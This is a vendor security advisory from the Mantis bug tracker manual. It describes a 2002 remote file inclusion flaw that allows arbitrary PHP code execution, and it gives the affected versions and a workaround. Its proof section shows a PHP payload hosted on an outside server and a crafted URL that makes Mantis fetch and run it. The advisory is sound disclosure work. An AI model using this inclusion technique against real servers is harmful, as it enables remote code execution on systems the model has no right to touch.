2002-04 Arbitrary code execution vulnerability in Mantis

Mantis Manual

2002-04 Arbitrary code execution vulnerability in Mantis
Last Modified: December 23, 2006 04:12AM

(Version 0.15.3 till 0.17.3)

Description

0. Table of Contents

1. Introduction
2. Summary / Impact analysis
3. Affected versions
4. Workaround / Solution
5. Proof of Vulnerability
6. Credit
7. Contact details

1. Introduction

Mantis is an Open Source web-based bugtracking system, written in PHP, which
uses the MySQL database server. It is being actively developed by a small
group of developers, and is considered to be in the beta stage.

2. Summary / Impact analysis

Mantis includes code which cooperates with JpGraph to generate some
statistical graphs. Some of this code is stored in an include file,
summary_graph_functions.php. This file takes care of loading the JpGraph
library, using an include() statement.

The path to the JpGraph library is stored in the configuration file.
However, summary_graph_functions.php does not load the configuration file,
but expects other scripts to have done that before including
summary_graph_functions.php.

A vulnerability opens up when summary_graph_functions.php is opened in a
browser. Any malicious user can execute arbitrary PHP code as the webserver
user by setting $g_jpgraph_path to a local path or an URL.
This vulnerability has been closed in Mantis 0.17.4.

3. Affected versions

The following versions are known to be affected:
Mantis 0.17.3
Mantis 0.17.2
Mantis 0.17.1
Mantis 0.17.0
Mantis 0.16.1
Mantis 0.16.0
Mantis 0.15.12
Mantis 0.15.11
Mantis 0.15.10
Mantis 0.15.9
Mantis 0.15.8
Mantis 0.15.7
Mantis 0.15.6
Mantis 0.15.5
Mantis 0.15.4
Mantis 0.15.3

The following versions are known to be unaffected:
Mantis 0.17.4a
Mantis 0.17.4
Any version below Mantis 0.15.3

4. Workaround / Solution

Mantis 0.17.4 adds various checks which prevent this vulnerability.
All users are recommended to upgrade to this version as soon as possible.

If an upgrade is not possible, the vulnerability can be closed by inserting
the following lines at the top of summary_graph_functions.php:

if ( isset($HTTP_GET_VARS['g_jpgraph_path']) || isset($HTTP_POST_VARS['g_jpgraph_path']) || isset($HTTP_COOKIE_VARS['g_jpgraph_path']) ) { exit; }

5. Proof of Vulnerability

To exploit this vulnerability, an attacker only has to store the PHP code
(s)he wishes to execute in a textfile, make this available on a webserver
accessible by the Mantis installation and point the $g_jpgraph_path variable
to that location.

For example, we create a file with the following content:

<?php system('ls'); exit; ?>

We make this file available on a webserver, for example at
http://server.mynetwork.net/listings.txt
If the Mantis installation does not have access to the internet, the file
should be stored on an internal server.

We then point our browser to
http://mantis.server.com/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fserver.mynetwork.net%2Flistings.txt%3F

This will execute the following call:
include('http://server.mynetwork.net/listings.txt?jpgraph.php');

This instructs PHP to download listings.txt and parse it as a PHP script. In
this case, the browser should print a file listing of the current directory.

6. Credit

This vulnerability was reported by Joao Gouveia (tharbad@kaotik.org).

7. Contact details
The latest version of Mantis is always available from:
http://www.mantisbt.org/
The current version is 1.0.6, which can be downloaded from
http://www.mantisbt.org/download.php

If you have any questions about this vulnerability, or wish to report
another, you can contact report it as a private issue on:
http://www.mantisbt.org/bugs/

The latest version of this and other advisories can be found at:
http://www.mantisbt.org/manual/

User Contributed Notes
2002-04 Arbitrary code execution vulnerability in Mantis

There are no user contributed notes for this page.

Last updated: Fri, 21 Nov 2008 - 9:28:09